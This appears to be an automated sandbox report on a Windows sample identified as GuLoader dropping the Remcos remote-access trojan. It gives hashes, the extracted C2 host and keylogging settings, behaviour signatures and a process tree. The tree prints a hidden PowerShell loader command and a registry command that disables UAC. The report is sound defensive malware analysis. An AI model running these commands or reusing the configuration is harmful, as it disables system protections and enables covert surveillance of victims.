Analysis

  • max time kernel
    150s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24/05/2023, 07:57

General

  • Target

    20090.exe

  • Size

    512KB

  • MD5

    70a84b3df0aa58818ce6945a9132f960

  • SHA1

    00dbfaedf9b3114c19cb5626223dcac4eb020a77

  • SHA256

    e35a97dee0da4b3afcb5cae5d51125167c42449ebaffec3f97bacf2b9d485851

  • SHA512

    796785384d3e5320cb2c81f8989d645486742623103d916c237075ce253ef08c31367035959d955e10b911565f346613285e268312c22ee379cfddeca288ea46

  • SSDEEP

    12288:t3w0eNbZ5daCskM62r1DBLIp6WubFffm/N/wqXJxq:t3w0MZZsNr1hIp6bBuFB5xq

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

a458386d9.duckdns.org:3256

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    Windows.exe

  • copy_folder

    Windows update

  • delete_file

    false

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    -VBBBJM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • UAC bypass 3 TTPs 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20090.exe
    "C:\Users\Admin\AppData\Local\Temp\20090.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1764
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden $cas = Get-Content 'C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Malarkies\Tugtemestrenes\Iza.Bun' ; powershell.exe ''$cas''
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3664
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          4⤵
          • Checks QEMU agent file
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3608
          • C:\Windows\SysWOW64\cmd.exe
            /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1452
            • C:\Windows\SysWOW64\reg.exe
              C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              6⤵
              • UAC bypass
              • Modifies registry key
              PID:1764

Network

        MITRE ATT&CK Enterprise v6

        Downloads

        • C:\ProgramData\remcos\logs.dat

          Filesize

          258B

          MD5

          dbf78ad54f17edaf17d9f36b85e1304e

          SHA1

          7df804f90b29c6ae663fc2d7c655854a4ab4049d

          SHA256

          f0ee7dae9eb619d14eb0746755f0fe81ff8e9ba731eb71047885c27a1ea85042

          SHA512

          8337e7667c798f5533e2eed6e441c79fe785ac6b1e3f71e25704e087c0451de7810664d981e824a2c452359d39786cda50bc77d3b69e728e4743b59cf837755d

        • C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Malarkies\Tugtemestrenes\Iza.Bun

          Filesize

          19KB

          MD5

          a2b15124d434d7e0bd0e16d933c473c8

          SHA1

          0c920467fd710a9affae102b406e9a6d9269c357

          SHA256

          c7481f4d7ee5548210d8b04473da15e5a8e7fe61e183a3614e706f4143ecb018

          SHA512

          3389240a8588f9f49c6a15c3ea85c41b722e9617a746713a95f4b728d10086476ed18f645ca61a0ef8bfa85dd79ee78c1b9bf9ea5e77235f7e7045c26c892888

        • C:\Users\Admin\AppData\Local\Temp\Heterokaryotic\Malarkies\Tugtemestrenes\Unsatirical.Spi60

          Filesize

          277KB

          MD5

          2e012f36a90dee4bf1d6e005ebec36e5

          SHA1

          771626c509aa9e33b0752fb7d5a115534cc3ad81

          SHA256

          2abb96a5c9f09263cd6120f1b15d01c7d2cd32cdefd0b9a6de3233248d4413f9

          SHA512

          72519e1750c2f99d5398bc03bff9a137fc8edf7169e66ce1720e8eb5899a4931fcb357b729791ee91c8af7ca0422c6fb39981c772ae4e19514f0edc0b5aac26c

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x33huych.x1u.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
